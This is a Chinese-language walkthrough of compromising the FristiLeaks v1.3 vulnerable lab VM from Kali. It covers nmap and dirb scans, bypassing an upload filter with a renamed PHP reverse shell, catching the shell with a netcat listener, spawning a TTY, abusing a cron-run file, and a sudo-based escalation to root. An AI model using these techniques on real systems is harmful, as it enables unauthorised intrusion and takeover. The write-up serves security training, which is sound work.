Kali滲透測試--FristiLeaks v1.3
執行環境
VMware Workstation 和 Oracle VM VirtualBox
攻擊機Kali linux
靶機Fristileaks 下載連結
目標
get UID 0 (root) and read the special flag file.
網路設定
靶機是ova格式的檔案,使用VMware Workstation匯入該檔案會提示
匯入失敗,因為FristiLeaks_1.3.ova 未通過 OVF 規範一致性或虛擬硬體合規性檢查。 請單擊“重試”放鬆 OVF 規範與虛擬硬體合規性檢查,並重新嘗試匯入;或單擊“取消”以取消匯入。 如果重新嘗試匯入,可能無法使用 VMware Workstation 中的虛擬機器。
重試並放鬆規範後能開啟,但是啟動靶機後獲取不到IP,上網查了一下好像是因為靶機的裝置網絡卡和配置檔案不一致。
於是嘗試了一下使用VirtualBox匯入該靶機,成功獲取到了靶機IP
Kali一直安裝在VMware Workstation就沒有動,設定兩臺虛擬機器的網路連線為橋接模式且使用同一個網路介面卡,使Kali和靶機相互連通
靶機IP
掃描開放埠
nmap -sS -Pn 192.168.31.29
-sS 半開放、隱身掃描
-Pn 非ping掃描,不執行主機發現,可以跳過防火牆
開放了80埠
開啟80埠頁面
使用dirb掃描目錄
dirb http://192.168.31.29/
發現robots.txt,開啟
三個目錄開啟都是相同的圖片
嘗試一下首頁裡的單詞
keep calm and drink fristi:保持冷靜,喝點fristi?
訪問fristi
dirb掃描
dirb http://192.168.31.29/fristi
無果
檢視原始碼
-by eezeepz:eezeepz會不會是個使用者名稱?
發現一張base64的圖片
複製到mousepad編輯器
mkdir 001 cd 001 touch encoding.txt mousepad encoding.txt
解碼
base64 -d encoding.txt
-d 解碼資料
是個png檔案,重定位成png,開啟看看
base64 -d encoding.txt > encoding.png
xdg-open encoding.png
會不會是密碼,試一下
登陸
登陸成功,可以上傳檔案下載一個php木馬上傳
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
上傳php-reverse-shell.php
只允許上傳png、jpg、gif圖片
使用nc監聽
先設定監聽的IP(Kali)和埠
vim php-reverse-shell.php
nc連線1234埠
nc -vlnp 1234
-v顯示指令執行過程
-l 使用監聽模式,監控傳入的資料
-n 直接使用ip地址,而不通過域名伺服器
-p設定本地主機使用的通訊埠
設定瀏覽器代理
Burp Suite抓包
開啟代理
上傳檔案,這個包攔下來了
新增到Repeater做修改再重新發送過去
直接在.php後加.jpg
Send傳送
改成 php.jpg Forward出去
上傳成功了
“The file has been uploaded to /uploads”:該檔案已上傳到 /uploads
於是到uploads下面檢視上傳的檔案
反彈shell
此時反彈了一個shell
ls檢視一下
cd到home
進入使用者eezeepz
發現使用者admin,eezeepz,fristigod,只有eezeepz可以進入,進入eezeepz,裡面有個notes.txt,開啟看看
根據提示,讓在tmp目錄下建立一個名為runthis的檔案,每行一條指令,輸出到cronresult下,系統每分鐘執行一次
賦予許可權
進入admin
現在可以進入admin了,檢視一下里面的內容
看一下cryptpass.py
cryptedpass.txt
whoisyourgodnow.txt
看樣子那個python程式碼是用來加密的
建立一個base64decode.py重寫一個解密程式碼
python解密
執行一下
得到兩個東西,很可能是密碼
執行python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/sh")'
切換到fristigod使用者
檢視目錄
到.secret_admin_stuff看看
發現一個可執行檔案doCom,執行一下
提示嘗試不錯,但是使用者錯了
提權
提權一下
進入
根據提示,執行
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
成功,去看/root下的檔案
開啟fristileaks_secrets.txt